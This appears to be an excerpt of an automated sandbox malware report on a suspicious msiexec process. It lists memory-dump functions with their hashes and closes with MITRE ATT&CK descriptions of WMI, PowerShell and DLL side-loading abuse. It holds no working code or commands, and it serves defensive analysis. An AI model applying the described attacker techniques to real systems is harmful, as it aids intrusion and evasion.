Instruction Fuzzy Hash: 7DC1A074E00218CFDB54DFA5C994B9DBBB2BF89300F2081AAD409AB355DB359E85CF51

Function 27480D48 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774655488.0000000027480000.00000040.00000800.00020000.00000000.sdmp, Offset: 27480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27480000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d64a37fb6a9101e13c758daa8861c2085eb27589df78ea398f6498d0f972589a
Instruction ID: 7e74c608e86bfcc571e742305c74d5bf28083a8b45ab7d0fc23601a0718109b9
Opcode Fuzzy Hash: d64a37fb6a9101e13c758daa8861c2085eb27589df78ea398f6498d0f972589a
Instruction Fuzzy Hash: 9EC1A074E00218CFDB54DFA5C994B9DBBB2BF89304F2081AAD409AB395DB359E85CF50

Function 27487D58 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774655488.0000000027480000.00000040.00000800.00020000.00000000.sdmp, Offset: 27480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27480000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f3b13d03993f4dfd919f6cdc05d2d0e2ec9041510d73dfd5fef9da465b71c8f
Instruction ID: 4f1b5a032a9d0219da40e3efa079109188b4deacb43d042899cdc468419ec676
Opcode Fuzzy Hash: 3f3b13d03993f4dfd919f6cdc05d2d0e2ec9041510d73dfd5fef9da465b71c8f
Instruction Fuzzy Hash: 42C1B074E00218CFDB14DFA5C994BADBBB2BF89300F2080AAD409AB355DB359E85CF50

Function 27487900 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774655488.0000000027480000.00000040.00000800.00020000.00000000.sdmp, Offset: 27480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27480000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cdca3a1db2d30c015a4ead71bdac128f3d24aecdc24afa325b6791230171ae4
Instruction ID: 992e2ee738ced77164e6a9d9482a36c02f59276c7a2c3b69051792eef654f1ab
Opcode Fuzzy Hash: 2cdca3a1db2d30c015a4ead71bdac128f3d24aecdc24afa325b6791230171ae4
Instruction Fuzzy Hash: BAC1A174E00218CFDB15DFA5C994BADBBB2BF89304F2081AAD409AB355DB359E85CF50

Function 27485198 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774655488.0000000027480000.00000040.00000800.00020000.00000000.sdmp, Offset: 27480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27480000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b053e51da2190832ebac693f6f55d6aa56091b9e166b23a9fc11170dc8422b8f
Instruction ID: 5e5e371b3cdd624dd22435b9c85f9210c6d7467b1ea5aa01b2f6ed9917e5bf34
Opcode Fuzzy Hash: b053e51da2190832ebac693f6f55d6aa56091b9e166b23a9fc11170dc8422b8f
Instruction Fuzzy Hash: E5C1AF74E00218CFDB54DFA5C994B9DBBB2BF89304F2081AAD409AB395DB359E85CF50

Function 274881B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774655488.0000000027480000.00000040.00000800.00020000.00000000.sdmp, Offset: 27480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27480000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0204990a18931a2ca3bf34157bf23593eb0787dd3d2295894fdf9ed24018218
Instruction ID: da8f836cbe3d62fe7ee97f0abe6123fda2293dfa850483b2a0308b5f5e1df254
Opcode Fuzzy Hash: f0204990a18931a2ca3bf34157bf23593eb0787dd3d2295894fdf9ed24018218
Instruction Fuzzy Hash: 66C1A074E10218CFDB54DFA5C994B9DBBB2BF89300F2081AAD809AB355DB359E85CF50

Function 27480040 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774655488.0000000027480000.00000040.00000800.00020000.00000000.sdmp, Offset: 27480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27480000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d793024b6e7ca927e4c880f67caa6f2e0e98c03024d0471357debc1eb7042582
Instruction ID: bc2cd7141ebf5e7ab6e771ccea1bf9d626ec5984b55428deb2b2ad9e0ff27dba
Opcode Fuzzy Hash: d793024b6e7ca927e4c880f67caa6f2e0e98c03024d0471357debc1eb7042582
Instruction Fuzzy Hash: 72C1A074E10218CFDB54DFA5C994B9DBBB2BF89300F2081AAD409AB355DB359E85CF50

Function 27487050 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774655488.0000000027480000.00000040.00000800.00020000.00000000.sdmp, Offset: 27480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27480000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e84ad76ae9aa52e12033c3220d8e56923814a97ecea006f3d23437a0c49a5d40
Instruction ID: 003b98758e12203d2cd6c3d41cecd1379327b019c92629cd580255ed7a736fc9
Opcode Fuzzy Hash: e84ad76ae9aa52e12033c3220d8e56923814a97ecea006f3d23437a0c49a5d40
Instruction Fuzzy Hash: DBC1BF74E00218CFDB55DFA5C994B9DBBB2BF89304F2081AAD409AB395DB349E85CF50

Function 274808F0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774655488.0000000027480000.00000040.00000800.00020000.00000000.sdmp, Offset: 27480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27480000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78a4a709cade1625acce8052ffb45b200823067103f6f0ebc55be7444d8957f8
Instruction ID: 9241e9f10f073834687b9057ee9d4a80dfbf8c90a65500dbbcad32f2dbd60795
Opcode Fuzzy Hash: 78a4a709cade1625acce8052ffb45b200823067103f6f0ebc55be7444d8957f8
Instruction Fuzzy Hash: A6C1A074E10218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF50

Function 27480498 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774655488.0000000027480000.00000040.00000800.00020000.00000000.sdmp, Offset: 27480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27480000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c57166f71319618b5a7f909464ceade2080ea5c9cdb9bec9be0da9b30c4b2cdc
Instruction ID: 5e63ac27e5dd9a3625e69151073e3168432b836d4b77adb2b2c2c2a1faa3b78d
Opcode Fuzzy Hash: c57166f71319618b5a7f909464ceade2080ea5c9cdb9bec9be0da9b30c4b2cdc
Instruction Fuzzy Hash: 62C1B174E10218CFEB54DFA5C954B9DBBB2BF89304F2081AAD409AB355DB349E85CF50

Function 274874A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774655488.0000000027480000.00000040.00000800.00020000.00000000.sdmp, Offset: 27480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27480000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3c406649b91a94318cc70bb83217e594997dd49679cd75f97aea976d3cac085
Instruction ID: 1186bf84acb8d696012a4d202bda6d680939c353f7e64328c791bfe284f5f677
Opcode Fuzzy Hash: e3c406649b91a94318cc70bb83217e594997dd49679cd75f97aea976d3cac085
Instruction Fuzzy Hash: FBC1A074E00218CFDB55DFA5C994B9DBBB2BF89300F2081AAD409AB395DB359E85CF50

Function 2745D350 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53f29f9c7cdbade9154c5941906357e3a2c87ac8a323c89a06f41d4ee4c02a22
Instruction ID: 6464148b6dea4b9f8899fa06de15b2550be4da908f0691e81e196e6206254c23
Opcode Fuzzy Hash: 53f29f9c7cdbade9154c5941906357e3a2c87ac8a323c89a06f41d4ee4c02a22
Instruction Fuzzy Hash: 8FC1AF74E00218CFDB54DFA5C994B9DBBB2BF89304F2081AAD409AB395DB359E85CF50

Function 2745D7A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 825de044801f7500d99e9cbe177d49bafd6e51046d2440a055931da96b0028b9
Instruction ID: 36f828d908e9ae61dd525ad10b812010e57b4f9884de54411607e75258fc7600
Opcode Fuzzy Hash: 825de044801f7500d99e9cbe177d49bafd6e51046d2440a055931da96b0028b9
Instruction Fuzzy Hash: 71C1A174E01218CFDB54DFA5C994BADBBB2BF89300F2081AAD409AB355DB359E85CF50

Function 2745C648 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d00af41ce2144c4a01952a4093120662e6b7f64e2a6aaa165d048d9bdeb5de1
Instruction ID: 4bf7316c8680b9842ff695fc0c9744213d03918da8c5c7ff3481171e4e1c417d
Opcode Fuzzy Hash: 9d00af41ce2144c4a01952a4093120662e6b7f64e2a6aaa165d048d9bdeb5de1
Instruction Fuzzy Hash: 31C1BF74E01218CFDB14DFA5C994B9DBBB2BF89300F2080AAD409AB395DB359E85CF50

Function 2745FA68 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6f5bdae72a6e197b0b1484767a06d9fd269807efd60810b452abb991f7f1c12
Instruction ID: e5b2ceee900e9ca790b0e9fbd5fed763b279661a5296e1bacc467934d8999a29
Opcode Fuzzy Hash: f6f5bdae72a6e197b0b1484767a06d9fd269807efd60810b452abb991f7f1c12
Instruction Fuzzy Hash: 06C1A074E00218CFDB54DFA5C994B9DBBB2BF89300F2081AAD409AB355DB359E85CF51

Function 2745F610 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df92c9c405c654fb643caa0b47ee9ba2e3730b9e25df84e6ca9568043f40653a
Instruction ID: 5052774f1872d5fd4fc0056ceff28f89c70dde7ecf2ab98c8a3b585604266955
Opcode Fuzzy Hash: df92c9c405c654fb643caa0b47ee9ba2e3730b9e25df84e6ca9568043f40653a
Instruction Fuzzy Hash: 94C19174E00218CFDB54DFA5C994B9DBBB2BF89300F2081AAD409AB395DB359E85CF51

Function 2745CEF8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1ace762b9468fcc72ad955727f78f865347f7b80c947f9d062e8bd9fd4fe886
Instruction ID: d5a28d1dfbf06de9a97c5a084baee9b5bd8d4ea8e9534bddad5dc0073d1d8b5c
Opcode Fuzzy Hash: e1ace762b9468fcc72ad955727f78f865347f7b80c947f9d062e8bd9fd4fe886
Instruction Fuzzy Hash: 53C1B074E01218CFDB14DFA5C994B9DBBB2BF89304F2081AAD409AB395DB349E85CF50

Function 2745CAA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 736cf5b624636ac1c3adca497955a4f6cf6dc280dc69b117ca9ddc50ea19119e
Instruction ID: 179763a8097293e46af5f743b94ee27ec409b434d9cd14a9ff3fcf3b6d00b8b7
Opcode Fuzzy Hash: 736cf5b624636ac1c3adca497955a4f6cf6dc280dc69b117ca9ddc50ea19119e
Instruction Fuzzy Hash: 50C1B074E01218CFDB15DFA5C994B9DBBB2BF89300F2080AAD409AB355DB359E85CF50

Function 2745B940 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5533339b779e341f0903c4f895e56242dcb97c3082ce7354ae55bf405f9549d5
Instruction ID: 912fc5114cce94f8a62c78a92400abc23962f86a375dbeba3e4eff35ccccf199
Opcode Fuzzy Hash: 5533339b779e341f0903c4f895e56242dcb97c3082ce7354ae55bf405f9549d5
Instruction Fuzzy Hash: 5DC1A1B4E00218CFDB14DFA5C994B9DBBB2BF89300F2081AAD409AB355DB359E85CF54

Function 2745ED60 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e04cd0568c3e6bacdd9f10648904c1e3f75feabd3b1d60e920c53c2fd16876ee
Instruction ID: 8854925f167b172df5973e854b92cc5c79a72f857fff1199828ad09609837f19
Opcode Fuzzy Hash: e04cd0568c3e6bacdd9f10648904c1e3f75feabd3b1d60e920c53c2fd16876ee
Instruction Fuzzy Hash: 7CC1A074E00218CFDB14DFA5C994B9DBBB2BF89300F2081AAD409AB395DB359E85CF51

Function 27450D60 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06c6d43f8747704f1a88a4c92a1a8ed7da3880db1cae4ebd4b1182410218507b
Instruction ID: 77b045df0f9bdc21aa6d3235b14c4fce3d8e4e874db547b8321bf94d3cc23adc
Opcode Fuzzy Hash: 06c6d43f8747704f1a88a4c92a1a8ed7da3880db1cae4ebd4b1182410218507b
Instruction Fuzzy Hash: 38C19074E00218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E85CF50

Function 27450900 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c229ce87bcb35d9830f5a130f5c1b8c200f1d6a37e8a5534677ca18fb03f62d1
Instruction ID: e5eacdfad3ba81aecd481d4e03f6c4201a662d8e2ded9c266667dea5e1e7c320
Opcode Fuzzy Hash: c229ce87bcb35d9830f5a130f5c1b8c200f1d6a37e8a5534677ca18fb03f62d1
Instruction Fuzzy Hash: F5C19F74E00218CFEB54DFA5C994B9DBBB2BF89301F2081A9D809AB355DB359E85CF50

Function 2745E908 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb34687bf91160af2ac7520ca161238ce4b31fd0b21e3da60ef165181530f99f
Instruction ID: 8fa9bfb480138b5379d8d21129e441594135294f52d7423f2b65fdcd069d22b0
Opcode Fuzzy Hash: bb34687bf91160af2ac7520ca161238ce4b31fd0b21e3da60ef165181530f99f
Instruction Fuzzy Hash: 2FC19174E00218CFDB55DFA5C994BADBBB2BF89300F2081AAD409AB355DB359E85CF50

Function 2745C1F0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc776a1c6f869dd943b5bbcfcf129797b62907277c459b48ebc33352d63eaca3
Instruction ID: ef0425d0cbdb31338cf7112bad0d8787e7a4b7d6621defc6f4585d09f3ac1127
Opcode Fuzzy Hash: bc776a1c6f869dd943b5bbcfcf129797b62907277c459b48ebc33352d63eaca3
Instruction Fuzzy Hash: 67C1AF74E01218CFDB14DFA5C994BADBBB2BF89300F2081AAD409AB355DB359E85CF50

Function 2745BD98 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b319c00f053d733eb1629132fe14fa99030205c86dd7fb2be2d95833c7cb23f
Instruction ID: 2115ad5fb736609a64290bcd08642e82d597b61e259ff6d58ce28215f7eb29dd
Opcode Fuzzy Hash: 4b319c00f053d733eb1629132fe14fa99030205c86dd7fb2be2d95833c7cb23f
Instruction Fuzzy Hash: 9AC19F74E01218CFDB54DFA5C994B9DBBB2BF89300F2081AAD409AB395DB359E85CF50

Function 2745F1B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65844b5bf304d45fc84de08b50f219c5a200520bc9235fe69776e771d0166b86
Instruction ID: c5f8dd11510d70653c87c4782e915efe6d8370505dae6b802a07829c6cb3b51e
Opcode Fuzzy Hash: 65844b5bf304d45fc84de08b50f219c5a200520bc9235fe69776e771d0166b86
Instruction Fuzzy Hash: 85C1A074E00218CFDB54DFA5C994B9DBBB2BF89300F2081AAD809AB355DB359E85CF51

Function 2745DC00 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dba2ecb9ac07ae7373158d52132b06037ab2afd3b6703179a035b9af3e7064d
Instruction ID: f3275cb90196dcedecac8e3690ed5921b1f0ac18844b2c462ff5909f9267c47b
Opcode Fuzzy Hash: 4dba2ecb9ac07ae7373158d52132b06037ab2afd3b6703179a035b9af3e7064d
Instruction Fuzzy Hash: 8FC19F74E00218CFDB54DFA5C994B9DBBB2BF89304F2081AAD409AB395DB359E85CF50

Function 2745B4E8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f469259f3b7fc3f6e9496ae14c2713bfbe1c9dc59182b9835ba4213b6397d5d4
Instruction ID: a9e247b90ea0d3d98aa2d4a513ca69c91ec93e9320405dd411500e8439e41435
Opcode Fuzzy Hash: f469259f3b7fc3f6e9496ae14c2713bfbe1c9dc59182b9835ba4213b6397d5d4
Instruction Fuzzy Hash: 82C190B4E00218CFDB54DFA5C994B9DBBB2BF89304F2081AAD409AB355DB359E85CF50

Function 274504A0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed80cfb3bdfa8e87175120a9969e24fbced2d9e493e3ebe38875a1b715549376
Instruction ID: 95af8bc67e7bcb5ea3fca0586af3c3a20b2cafec764cf2f8c8b316238fa9cc41
Opcode Fuzzy Hash: ed80cfb3bdfa8e87175120a9969e24fbced2d9e493e3ebe38875a1b715549376
Instruction Fuzzy Hash: 0EC18F74E01218CFDB54DFA5C994B9DBBB2BB89300F2081A9D809AB355DB359E85CF50

Function 2745E4B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60e58ff5418b704492f2e2819482664b879c7d957783134e62484e0a3351ee7f
Instruction ID: 618f729fb826a8911c6c7035f994b41411ee328ef22d36e7540ad448922cf972
Opcode Fuzzy Hash: 60e58ff5418b704492f2e2819482664b879c7d957783134e62484e0a3351ee7f
Instruction Fuzzy Hash: AEC19174E00218CFDB54DFA5C994B9DBBB2BF89304F2081AAD409AB395DB359E85CF50

Function 274833B8 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774655488.0000000027480000.00000040.00000800.00020000.00000000.sdmp, Offset: 27480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27480000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61cfbf3c8c06bc1570bc1ec152724259e6cffaab174df441a9b622ac976994
Instruction ID: a80d5aefd07ac25a630fa3c7d9af028322a7dc01d09cd7b6879f73f07125eea4
Opcode Fuzzy Hash: 2e61cfbf3c8c06bc1570bc1ec152724259e6cffaab174df441a9b622ac976994
Instruction Fuzzy Hash: 05B19474E10218CFDB54DFA9D894A9DBBB2FF89300F2081A9D819AB365DB34AD41CF50

Function 006BEB5B Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6a3948424922b0b1ef16c44d99c748ffca220e0f716f486fa9cb19cd9d4440e
Instruction ID: 57dbe8b80079c86702d3d8f6eb58f3dc18a3c2eac50bf0bc62791508d3d008fd
Opcode Fuzzy Hash: e6a3948424922b0b1ef16c44d99c748ffca220e0f716f486fa9cb19cd9d4440e
Instruction Fuzzy Hash: 7BA18D74A01228CFDB64DF64C994BE9BBB2BF4A301F1085EAE409A7350DB359E81CF51

Function 274833A8 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774655488.0000000027480000.00000040.00000800.00020000.00000000.sdmp, Offset: 27480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27480000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2913ffb5b8072020e323e65db79d0bd0e9b85c28932b8185d71c3ea8d6db72bd
Instruction ID: ac22564e3c9c5cbc6c124e9996b82e5d060d7dd9bb7b8fd25f39c2fdc6b3c196
Opcode Fuzzy Hash: 2913ffb5b8072020e323e65db79d0bd0e9b85c28932b8185d71c3ea8d6db72bd
Instruction Fuzzy Hash: DA519474E10608CFDB18DFAAD89499DFBF2BF89300F248169D819AB365DB349941CF50

Function 006BED3C Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c1f36f4c4332cad3d240485615998202044673f5e49a8bc2567f1a20f089704
Instruction ID: 8cae581dcc880552a0fd9828ae86c9fecb839d8e1f25893bc42ca9a8987b4fcc
Opcode Fuzzy Hash: 1c1f36f4c4332cad3d240485615998202044673f5e49a8bc2567f1a20f089704
Instruction Fuzzy Hash: 6C514F74A01228CFDB65DF24C994BE9B7B2BF4A301F5085EAE40AA7350DB759E81CF50

Function 274836CE Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774655488.0000000027480000.00000040.00000800.00020000.00000000.sdmp, Offset: 27480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27480000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 322a9aa86b18e8ac7ef226e50954a55c16cf455587442ad5e1ac0d57060402fd
Instruction ID: 600e33e79f425711eb8ab4205bdeb0ae6d8855a7b99cb4e497aeb5d810ba0ff2
Opcode Fuzzy Hash: 322a9aa86b18e8ac7ef226e50954a55c16cf455587442ad5e1ac0d57060402fd
Instruction Fuzzy Hash: 70D06774D0425C9BCB60DF58D8417EEB772AF86304F0024A6D508B7250D7309E918B1A

Function 006B1A0A Relevance: 5.1, Strings: 4, Instructions: 67COMMON

Download Yara Rule

Strings

b$@b$, xrefs: 006B1A7F, 006B1AAC, 006B1AC6
Fh, xrefs: 006B1A9A
Fh, xrefs: 006B1A70
Fh, xrefs: 006B1AB7

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID: Fh$Fh$Fh$b$@b$
API String ID: 0-3274429109
Opcode ID: 411b0969eb36947cf36fd17aea70052b17656d36936d3769e659849739c67ec7
Instruction ID: 4554f9ec17ae9d70218c98edeeda10ca306b03666e072c837fa5b4af29254fe8
Opcode Fuzzy Hash: 411b0969eb36947cf36fd17aea70052b17656d36936d3769e659849739c67ec7
Instruction Fuzzy Hash: 01216DB0E05218AFDB04EFB8C4556EEBBB3EB85304F2085AAD0049B355EB385A81CB51

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

